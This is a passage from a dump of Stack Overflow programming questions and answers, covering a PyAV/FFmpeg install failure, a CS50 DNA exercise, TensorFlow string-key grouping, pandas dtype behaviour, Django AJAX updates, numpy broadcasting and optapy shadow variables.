copying av/data/__init__.py -> build/lib.macosx-12.4-x86_64-cpython-39/av/data
running build_ext
running config
PyAV: 8.0.2 (unknown commit)
Python: 3.9.10 (main, Jun 28 2022, 17:49:16) \n[Clang 13.1.6 (clang-1316.0.21.2.5)]
platform: macOS-12.4-x86_64-i386-64bit
extension_extra:
include_dirs: [b'include']
libraries: []
library_dirs: []
define_macros: []
runtime_library_dirs: []
config_macros:
PYAV_COMMIT_STR="unknown-commit"
PYAV_VERSION=8.0.2
PYAV_VERSION_STR="8.0.2"
Could not find libavformat with pkg-config.
Could not find libavcodec with pkg-config.
Could not find libavdevice with pkg-config.
Could not find libavutil with pkg-config.
Could not find libavfilter with pkg-config.
Could not find libswscale with pkg-config.
Could not find libswresample with pkg-config.
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure
× Encountered error while trying to install package.
╰─> av
I have already tried suggested fixes, but no luck:
https://github.com/openvinotoolkit/cvat/issues/4406
Environment:
MacBook Pro (Intel x64)
macOS Monterey (Version 12.4)
(pyenv) Python 3.9.10
What other options could be applied to fix it?
| [
"Facing this same problem just last week. I would say the problem is that you are trying to install PyAv without the proper dynamic libraries from FFMPEG. PyAv is just a bunch of Python bindings to connect with binary dynamic libraries in the system. I'm also assuming you are probably on Ubuntu 18.04. The newest FFMPEG version on the standard repository is no good, it's 3.x.\nYou need either have to compile some FFMPEG version equal or above 4.0. To do that, you need to compile FFMPEG from the source, compile and install it with make and make install. Or you can add a repository with the binaries you want. I compiled it myself, and it generated all the libaries I needed, so that's what I describe here.\nFirst run ffmpeg on the terminal to make sure you have a FFMPEG version below 4.0. And if that's the case, run the following commands. They will download the source code, extract it, compile it and install the files. After that, the Python bindings of PyAv should find the correct libraries and the installation will be able to proceed.\nMake sure you have the dependences:\nsudo apt install yasm libvpx. libx264. cmake libavdevice-dev libavfilter-dev libopus-dev libvpx-dev pkg-config libsrtp2-dev libpython3-dev python3-numpy\nThen download the sources:\ncurl https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/ffmpeg/7:4.2.4-1ubuntu0.1/ffmpeg_4.2.4.orig.tar.xz --output ffmpeg_4.2.4\nExtract the file:\ntar -xf ffmpeg_4.2.4.orig.tar.xz\nEnter the directory:\ncd ffmpeg-4.2.4/\nAnd compile and install the files:\n./configure --disable-static --enable-shared --disable-doc\nmake\nsudo make install\nsudo ldconfig\nIt should now compile and install the dynamic libraries for FFMPEG 4.2.4. Once it finishes, open a NEW terminal, and type ffmpeg to verify that a new 4.x version is now avaliable. Then try to install CVAT again, it should work now.\n"
] | [
0
] | [] | [] | [
"cvat",
"ffmpeg",
"libav",
"pkg_config",
"python"
] | stackoverflow_0072789956_cvat_ffmpeg_libav_pkg_config_python.txt |
Q:
How do I print the person name in DNA PSET5 CS50x
I don't know how to print the person's name that matches the numbers (as strings) returned from "list4"
(sorry for bad English). So I use print(list4) and I get the right values, but I don't know how to get
the name of the person. Example: list4 = ['4', '1', '5'] - so how do I get 'Bob'? I would appreciate any help!
import csv
import sys
import itertools
import re
import collections
import json
import functools
def main():
# TODO: Check for command-line usage
# not done yet
filecsv = sys.argv[1]
filetext = sys.argv[2]
names = []
# TODO: Read DNA sequence file into a variable
with open(filecsv, "r") as csvfile:
reader = csv.reader(csvfile)
dict_list = list(reader)
names.append(dict_list)
# Open sequences file and convert to list
with open(filetext, "r") as file:
sequence = file.read()
# TODO: Find longest match of each STR in DNA sequence
find_STR = []
for i in range(1, len(dict_list[0])):
find_STR.append(longest_match(sequence, dict_list[0][i]))
#TODO: Check database for matching profiles
#convert dict_list to a string
listToStr = ' '.join([str(elem) for elem in dict_list])
#convert find_STR to a string
A = [str(x) for x in find_STR]
# compare both strings
list3 = set(A)&set(listToStr)
list4 = sorted(list3, key = lambda k : A.index(k))
if(list4):
print(name) # how???
return
def longest_match(sequence, subsequence):
"""Returns length of longest run of subsequence in sequence."""
# Initialize variables
longest_run = 0
subsequence_length = len(subsequence)
sequence_length = len(sequence)
# Check each character in sequence for most consecutive runs of subsequence
for i in range(sequence_length):
# Initialize count of consecutive runs
count = 0
# Check for a subsequence match in a "substring" (a subset of characters) within sequence
# If a match, move substring to next potential match in sequence
# Continue moving substring and checking for matches until out of consecutive matches
while True:
# Adjust substring start and end
start = i + count * subsequence_length
end = start + subsequence_length
# If there is a match in the substring
if sequence[start:end] == subsequence:
count += 1
# If there is no match in the substring
else:
break
# Update most consecutive matches found
longest_run = max(longest_run, count)
return longest_run
main()
A:
Start by inspecting the values in your variables. For example, look at dict_list and names for the small.csv file and you will find:
dict_list:
[['name', 'AGATC', 'AATG', 'TATC'], ['Alice', '2', '8', '3'], ['Bob', '4', '1', '5'], ['Charlie', '3', '2', '5']]
names:
[[['name', 'AGATC', 'AATG', 'TATC'], ['Alice', '2', '8', '3'], ['Bob', '4', '1', '5'], ['Charlie', '3', '2', '5']]]
First observation: dict_list is a list of lists (not dictionaries). This happens when you set dict_list = list(reader). Use csv.DictReader() if you want to create a list of dictionaries. You don't have to create a list of dictionaries, but you will find it makes it much easier to work with the data. Also, there is nothing gained by appending dict_list to another list (names).
Next, look at find_STR. For sequence 1 it is: [4, 1, 5]. However, you didn't save the longest match value with the STR sequence name. As a result, you have to reference the first list item in names (or dict_list).
Once you have the longest match values (in find_STR), you need to compare them to the names and sequence counts in dict_list, and find the one that matches. (For this sequence, it will be ['Bob', '4', '1', '5'].) Once you find the match, the first item in the list is the name you want: Bob.
None of the code to create A, list3 or list4 do this. They simply return '4', '1', '5' as different objects: A is a list of strings, list3 is an unsorted set of strings, and list4 is a sorted list of strings that matches A. There isn't a name there to print.
Good luck.
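For illustration, a minimal sketch (assuming dict_list and find_STR exactly as built in the question) of that final comparison:
str_counts = [str(n) for n in find_STR]
for row in dict_list[1:]:          # skip the header row
    if row[1:] == str_counts:      # compare this person's STR counts
        print(row[0])              # prints "Bob" for this sequence
        break
else:
    print("No match")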
| How do I print the person name in DNA PSET5 CS50x | I don't know how to print the person's name that matches the numbers (as strings) returned from "list4"
(sorry for bad english) So I use print(list4) and I get the right values, but I don't know how to get
the name from the person. Example : list4 = ['4', '1', '5'], so how I get 'Bob'? I would appreciate any help!
import csv
import sys
import itertools
import re
import collections
import json
import functools
def main():
# TODO: Check for command-line usage
# not done yet
filecsv = sys.argv[1]
filetext = sys.argv[2]
names = []
# TODO: Read DNA sequence file into a variable
with open(filecsv, "r") as csvfile:
reader = csv.reader(csvfile)
dict_list = list(reader)
names.append(dict_list)
# Open sequences file and convert to list
with open(filetext, "r") as file:
sequence = file.read()
# TODO: Find longest match of each STR in DNA sequence
find_STR = []
for i in range(1, len(dict_list[0])):
find_STR.append(longest_match(sequence, dict_list[0][i]))
#TODO: Check database for matching profiles
#convert dict_list to a string
listToStr = ' '.join([str(elem) for elem in dict_list])
#convert find_STR to a string
A = [str(x) for x in find_STR]
# compare both strings
list3 = set(A)&set(listToStr)
list4 = sorted(list3, key = lambda k : A.index(k))
if(list4):
print(name) # how???`
return
def longest_match(sequence, subsequence):
"""Returns length of longest run of subsequence in sequence."""
# Initialize variables
longest_run = 0
subsequence_length = len(subsequence)
sequence_length = len(sequence)
# Check each character in sequence for most consecutive runs of subsequence
for i in range(sequence_length):
# Initialize count of consecutive runs
count = 0
# Check for a subsequence match in a "substring" (a subset of characters) within sequence
# If a match, move substring to next potential match in sequence
# Continue moving substring and checking for matches until out of consecutive matches
while True:
# Adjust substring start and end
start = i + count * subsequence_length
end = start + subsequence_length
# If there is a match in the substring
if sequence[start:end] == subsequence:
count += 1
# If there is no match in the substring
else:
break
# Update most consecutive matches found
longest_run = max(longest_run, count)
return longest_run
main()
| [
"Start by inspecting the values in your variables. For example, look at dict_list and names for the small.csv file and you will find:\ndict_list:\n[['name', 'AGATC', 'AATG', 'TATC'], ['Alice', '2', '8', '3'], ['Bob', '4', '1', '5'], ['Charlie', '3', '2', '5']]\nnames:\n[[['name', 'AGATC', 'AATG', 'TATC'], ['Alice', '2', '8', '3'], ['Bob', '4', '1', '5'], ['Charlie', '3', '2', '5']]]\n\nFirst observation: dict_list is a list of lists (not dictionaries). This happens when you set dict_list = list(reader). Use csv.DictReader() if you want to create a list of dictionaries. You don't have to create a list of dictionaries, but you will find it makes it much easier to work with the data. Also, there is nothing gained by appending dict_list to another list (names).\nNext, look at find_STR. For sequence 1 is: [4, 1, 5]. However, you didn't save the longest match value with the STR sequence name. As a result, you have to reference the first list item in names (or dict_list).\nOnce you have the longest match values (in find_STR), you need to compare them to the names and sequence counts in dict_list, and find the 1 that matches. (For this sequence, it will be ['Bob', '4', '1', '5'].) Once you find the match, the first item in the list is the name you want: Bob.\nNone of the code to create A, list3 or list4 do this. They simply return '4', '1', '5' as different objects: A is a list of strings, list3 is an unsorted set of strings, and list4 is a sorted list of strings that matches A. There isn't a name there to print.\nGood luck.\n"
] | [
0
] | [] | [] | [
"cs50",
"python",
"python_3.x"
] | stackoverflow_0074586919_cs50_python_python_3.x.txt |
Q:
Tensorflow dataset group by string key
I have a tensorflow dataset that I would like to group by key. However, my keys are strings and not integers, so I can't do that:
person_tensor = tf.constant(["person1", "person2", "person1", "person3", "person3"])
value_tensor = tf.constant([1,2,3,4,5])
ds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})
# >> list(ds.as_numpy_iterator())
# [{'person': b'person1', 'value': 1},
# {'person': b'person2', 'value': 2},
# {'person': b'person1', 'value': 3},
# {'person': b'person3', 'value': 4},
# {'person': b'person3', 'value': 5}]
window_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group
ds.group_by_window(
key_func=lambda row: row['person'],
window_size=window_size,
reduce_func=lambda key, rows: rows.batch(window_size)
)
# ValueError: Tensor conversion requested dtype int64 for Tensor with dtype string: <tf.Tensor 'args_0:0' shape=() dtype=string>
This method complains about the string not being convertible to int64. Indeed, the key_func function is supposed to return an int64, not a string as I did.
Is there another method to group a dataset by key?
A:
You could try utilizing tf.lookup.StaticHashTable like this:
import tensorflow as tf
person_tensor = tf.constant(["person1", "person2", "person1", "person3", "person3"])
value_tensor = tf.constant([1,2,3,4,5])
k_tensor = tf.unique(person_tensor)[0]
v_tensor = tf.cast(tf.range(tf.shape(k_tensor)[0]), dtype=tf.int64)
table = tf.lookup.StaticHashTable(
tf.lookup.KeyValueTensorInitializer(k_tensor, v_tensor),
default_value=-1)
reverse_table = tf.lookup.StaticHashTable(
tf.lookup.KeyValueTensorInitializer(v_tensor, k_tensor),
default_value="")
ds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': table.lookup(person), 'value': value})
window_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group
ds = ds.group_by_window(
key_func=lambda row: row['person'],
window_size=window_size,
reduce_func=lambda key, rows: rows.batch(window_size)
)
ds = ds.map(lambda d: {'person': tf.unique(reverse_table.lookup(d['person']))[0], 'value': d['value']})
list(ds.as_numpy_iterator())
[{'person': array([b'person1'], dtype=object),
'value': array([1, 3], dtype=int32)},
{'person': array([b'person2'], dtype=object),
'value': array([2], dtype=int32)},
{'person': array([b'person3'], dtype=object),
'value': array([4, 5], dtype=int32)}]
Or if you really have some unique number in your strings, you could also try using tf.strings.bytes_split and tf.strings.to_number:
person_tensor = tf.constant(["person1", "person2", "person1", "person3", "person3"])
value_tensor = tf.constant([1,2,3,4,5])
ds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})
window_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group
ds = ds.group_by_window(
key_func=lambda row: tf.strings.to_number(tf.strings.bytes_split(row['person'])[-1], tf.int64),
window_size=window_size,
reduce_func=lambda key, rows: rows.batch(window_size)
)
ds = ds.map(lambda d: {'person': tf.unique(d['person'])[0], 'value': d['value']})
list(ds.as_numpy_iterator())
[{'person': array([b'person1'], dtype=object),
'value': array([1, 3], dtype=int32)},
{'person': array([b'person2'], dtype=object),
'value': array([2], dtype=int32)},
{'person': array([b'person3'], dtype=object),
'value': array([4, 5], dtype=int32)}]
Or you could try using tf.strings.to_hash_bucket_fast:
person_tensor = tf.constant(["person1", "person2", "person1", "person3", "person3"])
value_tensor = tf.constant([1,2,3,4,5])
ds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})
window_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group
ds = ds.group_by_window(
key_func=lambda row: tf.strings.to_hash_bucket_fast(row['person'], 5),
window_size=window_size,
reduce_func=lambda key, rows: rows.batch(window_size)
)
ds = ds.map(lambda d: {'person': tf.unique(d['person'])[0], 'value': d['value']})
list(ds.as_numpy_iterator())
[{'person': array([b'person3'], dtype=object),
'value': array([4, 5], dtype=int32)},
{'person': array([b'person1'], dtype=object),
'value': array([1, 3], dtype=int32)},
{'person': array([b'person2'], dtype=object),
'value': array([2], dtype=int32)}]
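One caveat on the last approach: tf.strings.to_hash_bucket_fast can map two different keys to the same bucket when the number of buckets is small, which would silently merge their groups, so the bucket count should be chosen comfortably larger than the number of distinct keys.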
| Tensorflow dataset group by string key | I have a tensorflow dataset that I would like to group by key. However, my keys are strings and not integers to I can't do that:
person_tensor = tf.constant(["person1", "person2", "person1", "person3", "person3"])
value_tensor = tf.constant([1,2,3,4,5])
ds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})
# >> list(ds.as_numpy_iterator())
# [{'person': b'person1', 'value': 1},
# {'person': b'person2', 'value': 2},
# {'person': b'person1', 'value': 3},
# {'person': b'person3', 'value': 4},
# {'person': b'person3', 'value': 5}]
window_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group
ds.group_by_window(
key_func=lambda row: row['person'],
window_size=window_size,
reduce_func=lambda key, rows: rows.batch(window_size)
)
# ValueError: Tensor conversion requested dtype int64 for Tensor with dtype string: <tf.Tensor 'args_0:0' shape=() dtype=string>
This method complains about string not being able to be converted to int64. Indeed, the key_func function is supposed to return an int64 and not a string as I did.
Is there another method to group a dataset by key?
| [
"You could try utilizing tf.lookup.StaticHashTable like this:\nimport tensorflow as tf \n\nperson_tensor = tf.constant([\"person1\", \"person2\", \"person1\", \"person3\", \"person3\"])\nvalue_tensor = tf.constant([1,2,3,4,5])\n\nk_tensor = tf.unique(person_tensor)[0]\nv_tensor = tf.cast(tf.range(tf.shape(k_tensor)[0]), dtype=tf.int64)\ntable = tf.lookup.StaticHashTable(\n tf.lookup.KeyValueTensorInitializer(k_tensor, v_tensor),\n default_value=-1)\n\nreverse_table = tf.lookup.StaticHashTable(\n tf.lookup.KeyValueTensorInitializer(v_tensor, k_tensor),\n default_value=\"\")\n\nds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': table.lookup(person), 'value': value})\n\nwindow_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group\nds = ds.group_by_window(\n key_func=lambda row: row['person'],\n window_size=window_size,\n reduce_func=lambda key, rows: rows.batch(window_size)\n)\nds = ds.map(lambda d: {'person': tf.unique(reverse_table.lookup(d['person']))[0], 'value': d['value']})\nlist(ds.as_numpy_iterator())\n\n[{'person': array([b'person1'], dtype=object),\n 'value': array([1, 3], dtype=int32)},\n {'person': array([b'person2'], dtype=object),\n 'value': array([2], dtype=int32)},\n {'person': array([b'person3'], dtype=object),\n 'value': array([4, 5], dtype=int32)}]\n\nOr if you really have some unique number in your strings, you could also try using tf.strings.bytes_split and tf.strings.to_number:\nperson_tensor = tf.constant([\"person1\", \"person2\", \"person1\", \"person3\", \"person3\"])\nvalue_tensor = tf.constant([1,2,3,4,5])\nds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})\nwindow_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group\nds = ds.group_by_window(\n key_func=lambda row: tf.strings.to_number(tf.strings.bytes_split(row['person'])[-1], tf.int64),\n window_size=window_size,\n reduce_func=lambda key, rows: rows.batch(window_size)\n)\nds = ds.map(lambda d: {'person': tf.unique(d['person'])[0], 'value': d['value']})\n\nlist(ds.as_numpy_iterator())\n\n[{'person': array([b'person1'], dtype=object),\n 'value': array([1, 3], dtype=int32)},\n {'person': array([b'person2'], dtype=object),\n 'value': array([2], dtype=int32)},\n {'person': array([b'person3'], dtype=object),\n 'value': array([4, 5], dtype=int32)}]\n\nOr you could try using tf.strings.to_hash_bucket_fast:\nperson_tensor = tf.constant([\"person1\", \"person2\", \"person1\", \"person3\", \"person3\"])\nvalue_tensor = tf.constant([1,2,3,4,5])\nds = tf.data.Dataset.from_tensor_slices((person_tensor, value_tensor)).map(lambda person, value: {'person': person, 'value': value})\nwindow_size = 10 # not very important, I don't care getting multiple groups for one key as long as there is only one key per group\nds = ds.group_by_window(\n key_func=lambda row: tf.strings.to_hash_bucket_fast(row['person'], 5),\n window_size=window_size,\n reduce_func=lambda key, rows: rows.batch(window_size)\n)\nds = ds.map(lambda d: {'person': tf.unique(d['person'])[0], 'value': d['value']})\n\nlist(ds.as_numpy_iterator())\n\n[{'person': array([b'person3'], dtype=object),\n 'value': array([4, 5], dtype=int32)},\n {'person': array([b'person1'], dtype=object),\n 'value': array([1, 3], dtype=int32)},\n {'person': array([b'person2'], dtype=object),\n 'value': array([2], 
dtype=int32)}]\n\n"
] | [
1
] | [] | [] | [
"group_by",
"hashmap",
"python",
"tensorflow",
"tensorflow_datasets"
] | stackoverflow_0074602575_group_by_hashmap_python_tensorflow_tensorflow_datasets.txt |
Q:
pandas astype doesn't work as expected (fails silently and badly)
I've encountered this strange behavior of pandas .astype() (I'm using version 1.5.2). When trying to cast a column to integer and later requesting dtypes, all seems fine - until you try to extract the values by row, when you get inconsistent types.
Code:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.randn(3, 3))
df.loc[:, 0] = df.loc[:, 0].astype(int)
print(df)
print(df.dtypes)
print(df.iloc[0, :])
print(type(df.values[0, 0]))
Out:
0 1 2
0 0 -0.232432 1.025643
1 -1 0.556968 -0.729378
2 -1 1.285546 -0.541676
0 int64
1 float64
2 float64
dtype: object
0 0.000000
1 -0.232432
2 1.025643
Name: 0, dtype: float64
<class 'numpy.float64'>
Any guess as to what I'm doing wrong here?
I tried to call it without loc, as
df[0] = df[0].astype(int)
but that didn't work either.
A:
I think this is due to the usage of df.values because it will try to return a Numpy representation of the DataFrame. As per the docs
By default, the dtype of the returned array will be the common NumPy
dtype of all types in the DataFrame.
>>> from pandas.core.dtypes.cast import find_common_type
>>> find_common_type(df.dtypes.to_list()) # df is your dataframe
dtype('float64')
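As a quick illustration of the difference, using the dataframe from the question:
print(type(df.loc[0, 0]))      # <class 'numpy.int64'> -- scalar access keeps the column dtype
print(df[0].to_numpy().dtype)  # int64 -- a single column converts on its own
print(df.to_numpy().dtype)     # float64 -- the whole frame upcasts to the common dtype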
| pandas astype doesn't work as expected (fails silently and badly) | I've encountered this strange behavior of pandas .astype() (I'm using version 1.5.2). When trying to cast a column as integer, and later requesting dtypes, all seems fine. Until you try to extract the values by row, when you get inconsistent types.
Code:
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.randn(3, 3))
df.loc[:, 0] = df.loc[:, 0].astype(int)
print(df)
print(df.dtypes)
print(df.iloc[0, :])
print(type(df.values[0, 0]))
Out:
0 1 2
0 0 -0.232432 1.025643
1 -1 0.556968 -0.729378
2 -1 1.285546 -0.541676
0 int64
1 float64
2 float64
dtype: object
0 0.000000
1 -0.232432
2 1.025643
Name: 0, dtype: float64
<class 'numpy.float64'>
Any guess of what I'm doing wrong here?
Tried to call without loc as
df[0] = df[0].astype(int)
dind't work either
| [
"I think this is due to the usage of df.values because it will try to return a Numpy representation of the DataFrame. As per the docs\n\nBy default, the dtype of the returned array will be the common NumPy\ndtype of all types in the DataFrame.\n\n>>> from pandas.core.dtypes.cast import find_common_type\n>>> find_common_type(df.dtypes.to_list()) # df is your dataframe\ndtype('float64')\n\n"
] | [
1
] | [] | [] | [
"casting",
"dtype",
"pandas",
"python"
] | stackoverflow_0074602610_casting_dtype_pandas_python.txt |
Q:
How to update the data on the page without reloading. Python - Django
I am a beginner Python developer. I need to update several values on the page regularly with a frequency of 1 second. I understand that I need to use Ajax, but I have no idea how to do it.
Help write an AJAX script that calls a specific method in the view
I have written view
class MovingAverage(TemplateView):
template_name = 'moving_average/average.html'
def get(self, request, *args, **kwargs):
return render(request, 'moving_average/average.html')
def post(self, request, *args, **kwargs):
self.symbol = request.POST.get('symbol')
self.interval = request.POST.get('interval')
self.periods = int(request.POST.get('periods')) if request.POST.get('periods') != '' else 0
self.quantity = float(request.POST.get('quantity')) if request.POST.get('quantity') != '' else 0
self.delta = float(request.POST.get('delta').strip('%')) / 100
self.button()
return render(request, 'moving_average/average.html')
A:
Here, we need two pieces to fetch data with AJAX:
First, we need to create a JsonResponse view function in the views.py file.
# views.py
from django.http import JsonResponse
def get_some_data(request):
try:
if request.method == "POST":
get_some_data = [1, 2, 3, 4, 5] # You can run the query instead
return JsonResponse({"data": get_some_data})
else:
return JsonResponse({"error": "Invalid Method"})
except Exception as ep:
return JsonResponse({"error": str(ep)})
Create a path for this function in the urls.py file:
# urls.py
path("get-some-data/", views.get_some_data, name="get-some-data")
Now we create an AJAX call to get the data without reloading the page:
$.ajax({
type: "POST",
url: "{% url 'get-some-data' %}",
data: {
id: 2, // You can send any type of data ...
csrfmiddlewaretoken: $("input[name=csrfmiddlewaretoken]").val(), //This is important as we are making POST request, so CSRF verification is important ...
},
success: function(data) {
console.log(data); // Here you can manipulate some D.O.M. for rendering some data ...
}
})
That's it. You are good to go now.
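And since the goal is a refresh every second, one way (a sketch, assuming the $.ajax call above is wrapped in a function named fetchData) is to poll the endpoint with setInterval:
setInterval(fetchData, 1000); // re-run the AJAX request once per second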
| How to update the data on the page without reloading. Python - Django | I am a beginner Python developer. I need to update several values on the page regularly with a frequency of 1 second. I understand that I need to use Ajax, but I have no idea how to do it.
Help write an AJAX script that calls a specific method in the view
I have written view
class MovingAverage(TemplateView):
template_name = 'moving_average/average.html'
def get(self, request, *args, **kwargs):
return render(request, 'moving_average/average.html')
def post(self, request, *args, **kwargs):
self.symbol = request.POST.get('symbol')
self.interval = request.POST.get('interval')
self.periods = int(request.POST.get('periods')) if request.POST.get('periods') != '' else 0
self.quantity = float(request.POST.get('quantity')) if request.POST.get('quantity') != '' else 0
self.delta = float(request.POST.get('delta').strip('%')) / 100
self.button()
return render(request, 'moving_average/average.html')
| [
"Here, we need two functions to call out data from AJAX:\nFirst, we need to create JsonResponse views function in the views.py file.\n# views.py\n\nfrom django.http import JsonResponse\n\ndef get_some_data(request):\n try:\n if request.method == \"POST\":\n get_some_data = [1, 2, 3, 4, 5] # You can run the query instead\n return JsonResponse({\"data\": get_some_data})\n else:\n return JsonResponse({\"error\": \"Invalid Method\"})\n except Exception as ep:\n return JsonResponse({\"error\": str(ep)})\n\nCreate a path for this function in urls.py file.\n# urls.py\npath(\"get-some-data/\", views.get_some_data, name=\"get-some-data\")\n\nNow, we create some AJAX call for getting data without reloading page ...\n$.ajax({\n type: \"POST\",\n url: \"{% url 'get-some-data' %}\",\n data: {\n id: 2, // You can send any type of data ...\n csrfmiddlewaretoken: $(\"input[name=csrfmiddlewaretoken]\").val(), //This is important as we are making POST request, so CSRF verification is important ... \n },\n success: function(data) {\n console.log(data); // Here you can manipulate some D.O.M. for rendering some data ... \n }\n})\n\nThat's it. You are good to go now.\n"
] | [
0
] | [] | [] | [
"ajax",
"django",
"python"
] | stackoverflow_0074602453_ajax_django_python.txt |
Q:
How can you do an outer summation over only one dimension of a numpy 2D array?
I have a (square) 2 dimensional numpy array where I would like to compare (subtract) all of the values within each row to each other, but not to other rows, so the output should be a 3D array.
matrix = np.array([[10,1,32],[32,4,15],[6,3,1]])
Output should be a 3x3x3 array which looks like:
output = [[[0,-9,22],[0,-28,-17],[0,-3,-5]], [[9,0,31],[28,0,11],[3,0,-2]], [[-22,-31,0],[17,-11,0],[5,2,0]]]
I.e. for output[0], for each of the 3 rows of matrix, subtract that row's zeroth element from every other, for output[1] subtract each row's first element etc.
This seems to me like a reduced version of numpy's ufunc.outer functionality which should be possible with
tryouter = np.subtract(matrix, matrix)
and then taking some clever slice and/or transposition.
Indeed, if you do this, one finds that: output[i,j] = tryouter[i,j,i]
This looks like it should be solvable by using np.transpose to switch the 1 and 2 axes and then taking the arrays on the new 0,1 diagonal but I can't work out how to do this with numpy diagonal or any slicing method.
Is there a way to do this or is there a simpler approach to this whole problem built into numpy?
Thanks :)
A:
You're close, you can do it with broadcasting:
out = matrix[None, :, :] - matrix.T[:, :, None]
Here .T is the same as np.transpose, and using None as an index introduces a new dummy dimension of size 1.
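A quick check against the expected output from the question:
import numpy as np

matrix = np.array([[10, 1, 32], [32, 4, 15], [6, 3, 1]])
out = matrix[None, :, :] - matrix.T[:, :, None]
print(out[0])  # [[0 -9 22], [0 -28 -17], [0 -3 -5]] -- matches output[0]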
| How can you do an outer summation over only one dimension of a numpy 2D array? | I have a (square) 2 dimensional numpy array where I would like to compare (subtract) all of the values within each row to each other but not to other rows so the output should be a 3D array.
matrix = np.array([[10,1,32],[32,4,15],[6,3,1]])
Output should be a 3x3x3 array which looks like:
output = [[[0,-9,22],[0,-28,-17],[0,-3,-5]], [[9,0,31],[28,0,11],[3,0,-2]], [[-22,-31,0],[17,-11,0],[5,2,0]]]
I.e. for output[0], for each of the 3 rows of matrix, subtract that row's zeroth element from every other, for output[1] subtract each row's first element etc.
This seems to me like a reduced version of numpy's ufunc.outer functionality which should be possible with
tryouter = np.subtract(matrix, matrix)
and then taking some clever slice and/or transposition.
Indeed, if you do this, one finds that: output[i,j] = tryouter[i,j,i]
This looks like it should be solvable by using np.transpose to switch the 1 and 2 axes and then taking the arrays on the new 0,1 diagonal but I can't work out how to do this with numpy diagonal or any slicing method.
Is there a way to do this or is there a simpler approach to this whole problem built into numpy?
Thanks :)
| [
"You're close, you can do it with broadcasting:\nout = matrix[None, :, :] - matrix.T[:, :, None]\n\nHere .T is the same as np.transpose, and using None as an index introduces a new dummy dimension of size 1.\n"
] | [
4
] | [] | [] | [
"array_broadcasting",
"numpy",
"python"
] | stackoverflow_0074602528_array_broadcasting_numpy_python.txt |
Q:
Is it possible to write a combined version of the OptaPlanner's task assignment and project scheduling examples in OptaPy?
I know that custom shadow variables are currently not supported in optapy, so is there a way to solve the optimization problem below: distribute tasks from the project among employees, given that the tasks have a clear order in which they must be performed and people have skills, depending on which the task execution time changes?
All ideas will be appreciated.
A:
Custom shadow variables ARE supported in optapy: https://www.optapy.org/docs/latest/shadow-variable/shadow-variable.html#customVariableListener ; It uses the old style of @CustomShadowVariable (@custom_shadow_variable in Python) instead of @ShadowVariable. However, ListVariableListener is not currently supported. You can use the old chained model of the domain and constraints, which should be fully supported in optapy. Support for the new @ShadowVariable and ListVariableListener will be added in a future version of optapy.
Here is how the variable listener would look in Python:
from optapy import variable_listener
@variable_listener
class StartTimeUpdatingVariableListener:
def beforeEntityAdded(self, scoreDirector, task):
pass
def afterEntityAdded(self, scoreDirector, task):
self.updateStartTime(scoreDirector, task)
def beforeVariableChanged(self, scoreDirector, task):
pass
def afterVariableChanged(self, scoreDirector, task):
self.updateStartTime(scoreDirector, task)
def beforeEntityRemoved(self, scoreDirector, task):
pass
def afterEntityRemoved(self, scoreDirector, task):
pass
def updateStartTime(self, scoreDirector, sourceTask):
previous = sourceTask.getPreviousTaskOrEmployee()
shadowTask = sourceTask
previousEndTime = None if previous is None else previous.getEndTime()
startTime = self.calculateStartTime(shadowTask, previousEndTime)
while shadowTask is not None and shadowTask.getStartTime() != startTime:
scoreDirector.beforeVariableChanged(shadowTask, "startTime")
shadowTask.setStartTime(startTime)
scoreDirector.afterVariableChanged(shadowTask, "startTime")
previousEndTime = shadowTask.getEndTime()
shadowTask = shadowTask.getNextTask()
startTime = self.calculateStartTime(shadowTask, previousEndTime)
def calculateStartTime(self, task, previousEndTime):
if task is None or previousEndTime is None:
return None
return max(task.getReadyTime(), previousEndTime)
and here is how it can be used in a @custom_shadow_variable:
from optapy import planning_entity, planning_variable, custom_shadow_variable, planning_variable_reference
@planning_entity
class Task:
# ...
@custom_shadow_variable(variable_listener_class = StartTimeUpdatingVariableListener,
sources=[planning_variable_reference('previousTaskOrEmployee')])
def get_start_time(self):
return self.start_time
def set_start_time(self, start_time):
self.start_time = start_time
| Is it possible to write a combined version of the OptaPlanner's task assignment and project scheduling examples in OptaPy? | I know that custom shadow variables are currently not supported in optapy, so is there a way to solve the optimization problem below: distribute tasks from the project among employees, given that the tasks have a clear order in which they must be performed and people have skills, depending on which the task execution time changes?
All ideas will be appreciated.
| [
"Custom shadow variables ARE supported in optapy: https://www.optapy.org/docs/latest/shadow-variable/shadow-variable.html#customVariableListener ; It uses the old style of @CustomShadowVariable (@custom_shadow_variable in Python) instead of @ShadowVariable. However, ListVariableListener is not currently supported. You can use the old chained model of the domain and constraints, which should be fully supported in optapy. Support for the new @ShadowVariable and ListVariableListener will be added in a future version of optapy.\nHere how the variable listener would look in Python:\nfrom optapy import variable_listener\n\n@variable_listener\nclass StartTimeUpdatingVariableListener:\n\n def beforeEntityAdded(self, scoreDirector, task):\n pass\n \n def afterEntityAdded(self, scoreDirector, task):\n self.updateStartTime(scoreDirector, task)\n \n def beforeVariableChanged(self, scoreDirector, task):\n pass\n\n def afterVariableChanged(self, scoreDirector, task):\n self.updateStartTime(scoreDirector, task)\n\n def beforeEntityRemoved(self, scoreDirector, task):\n pass\n\n def afterEntityRemoved(self, scoreDirector, task):\n pass\n\n def updateStartTime(self, scoreDirector, 